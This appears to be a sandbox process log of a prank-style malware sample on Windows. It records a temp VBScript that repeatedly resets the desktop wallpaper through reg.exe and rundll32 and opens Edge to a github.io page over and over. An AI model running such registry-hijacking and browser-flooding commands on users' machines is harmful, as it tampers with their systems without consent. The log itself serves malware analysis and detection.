"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9692 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11204 /prefetch:1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11844 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2436 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1832 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4544 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=14024 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=15316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=15648 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=16488 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=16980 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=17284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=17628 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=15680 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

